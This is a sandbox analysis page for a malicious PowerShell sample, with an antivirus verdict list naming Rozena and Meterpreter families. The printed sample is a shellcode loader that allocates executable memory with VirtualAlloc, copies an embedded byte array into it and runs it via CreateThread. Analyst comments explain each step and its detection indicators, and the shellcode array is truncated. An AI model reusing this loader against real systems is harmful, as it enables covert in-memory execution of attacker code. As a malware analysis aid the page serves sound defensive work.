Static | ZeroBOX
No static analysis available.
# Analyst annotation (comments only; the sample text below is unchanged).
# The here-string assigned to $XbessADgMdBR holds C# P/Invoke declarations for two
# kernel32.dll exports: VirtualAlloc and CreateThread.
# Add-Type compiles that member definition at runtime into the type Win32Functions.Win32;
# -passthru returns the type object so its static methods can be called through $EjtoggkQoPufE.
# Detection angle: "Add-Type -memberDefinition" together with "[DllImport("kernel32.dll")]"
# and these two API names is visible in clear text to PowerShell script block logging and to
# AMSI-integrated scanners, even though the variable names are randomised.
# NOTE(review): the closing "@ of the here-string is not visible in this listing; it was
# presumably lost when the page was extracted.
$XbessADgMdBR = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
$EjtoggkQoPufE = Add-Type -memberDefinition $XbessADgMdBR -Name "Win32" -namespace Win32Functions -passthru
[Byte[]] $qJiSqOwLYsN = 0xba,0xf5,0xe0,0xe2,0xb5,0xdd,0xc3,0xd9,0x74,0x24,0xf4,0x5e,0x31,0xc9,0xb1,0x88,0x31,0x56,0x12,0x3,0x56,0x12,0x83,0x33,0xe4,0x0,0x40,0x3,0x5e,0xab,0x17,0x8d,0x7c,0xf3,0xb1,0x5,0x5b,0x8,0x1f,0xd6,0x6a,0x41,0x21,0x29,0x2b,0xb1,0x21,0xf,0xa0,0x36,0xcb,0xc8,0x4b,0x71,0x33,0x8b,0xd8,0x44,0xc7,0x66,0x4e,0xd2,0xcb,0xa8,0x67,0x5f,0x9,0x2b,0xde,0xd8,0x4a,0x50,0x62,0xdd,0xdc,0x21,0xd4,0x71,0xbb,0x5,0x59,0xd8,0x7a,0x67,0x71,0x85,0xff,0xe6,0x56,0x9f,0xfc,0x52,0x8e,0x15,0x3e,0x18,0xa5,0x21,0x9e,0x8b,0x39,0x78,0xd8,0x72,0x89,0xba,0xe6,0xac,0x96,0xf7,0xa,0x3c,0xa0,0x2e,0xc7,0x6a,0x2,0x6d,0x92,0x80,0xb9,0x31,0x7b,0x35,0x88,0x57,0xf7,0x81,0x43,0xff,0x62,0x18,0x2,0xd,0xe0,0x7d,0x4,0xaa,0x6f,0x40,0x61,0x76,0xcc,0x6a,0xfc,0xc0,0xee,0xd4,0xb0,0xf,0x85,0xb0,0x8e,0x14,0x50,0x83,0x64,0x14,0x4b,0x59,0xea,0x4c,0xaf,0xfc,0xd1,0x6,0xc2,0x95,0x59,0xf4,0x21,0xaf,0xe2,0xbb,0xdc,0x7,0xe0,0x9c,0xaa,0x57,0xc4,0x8,0x1e,0x23,0xba,0x11,0x95,0xab,0x37,0x79,0x4e,0x3b,0x90,0xef,0xca,0x52,0xbf,0xca,0x2d,0xd1,0x77,0x90,0xf5,0x
# Analyst annotation (comments only; the sample text below is unchanged).
# Step 1: VirtualAlloc with lpAddress 0 (no preferred address), a size equal to the larger of
# the byte array's length and 0x1000, allocation type 0x3000 (MEM_COMMIT | MEM_RESERVE) and
# protection 0x40 (PAGE_EXECUTE_READWRITE). A script host requesting memory that is both
# writable and executable is a strong behavioural indicator for endpoint monitoring.
$pIXHrvja = $EjtoggkQoPufE::VirtualAlloc(0,[Math]::Max($qJiSqOwLYsN.Length,0x1000),0x3000,0x40)
# Step 2: Marshal.Copy writes the whole managed byte array $qJiSqOwLYsN (declared in the
# preceding statement) into the region returned by VirtualAlloc, starting at offset 0.
[System.Runtime.InteropServices.Marshal]::Copy($qJiSqOwLYsN,0,$pIXHrvja,$qJiSqOwLYsN.Length)
# Step 3: CreateThread is given the allocated region as lpStartAddress, so the copied bytes
# run as native code inside the PowerShell process. The returned handle is not stored and no
# wait on the thread is visible in this listing. A thread whose start address lies in private
# memory that no file on disk backs is the second behavioural indicator to alert on.
$EjtoggkQoPufE::CreateThread(0,0,$pIXHrvja,0,0,0)
Antivirus Signature
Bkav Clean
Lionic Trojan.Script.Powershell.4!c
tehtris Clean
MicroWorld-eScan Generic.Powershell.Injector.B.F427E818
CTX powershell.trojan.rozena
CAT-QuickHeal PS1.Trojan.48671
Skyhigh PS/MPreter
ALYac Generic.Powershell.Injector.B.F427E818
Malwarebytes Clean
Zillya Clean
Sangfor Trojan.Generic-PS.Save.f269422b
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
Baidu Clean
VirIT Clean
Symantec Hacktool.Rexershell
ESET-NOD32 PowerShell/Rozena.AH
TrendMicro-HouseCall Clean
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan.PowerShell.Generic
BitDefender Generic.Powershell.Injector.B.F427E818
NANO-Antivirus Clean
ViRobot Clean
Sophos ATK/Venom-A
F-Secure Trojan.TR/PShell.Agent.PRC
DrWeb PowerShell.Shellcode.24
VIPRE Generic.Powershell.Injector.B.F427E818
TrendMicro Clean
CMC Clean
Emsisoft Generic.Powershell.Injector.B.F427E818 (B)
huorong Backdoor/Meterpreter.as
FireEye Generic.Powershell.Injector.B.F427E818
Jiangmin Clean
Varist PSH/Rozena.B.gen!Camelot
Avira TR/PShell.Agent.PRC
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Generic.Powershell.Injector.B.F427E818
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.PowerShell.Generic
Microsoft Trojan:PowerShell/Rozena.HNAB!MTB
Google Detected
AhnLab-V3 Clean
Acronis Clean
VBA32 Clean
TACHYON Clean
Zoner Clean
Tencent Win32.Trojan.Generic.Gkjl
Yandex Clean
Ikarus Trojan.PowerShell.Rozena
MaxSecure Clean
Fortinet Clean
Panda Clean
alibabacloud Trojan:Win/Rozena.AJ
No IRMA results available.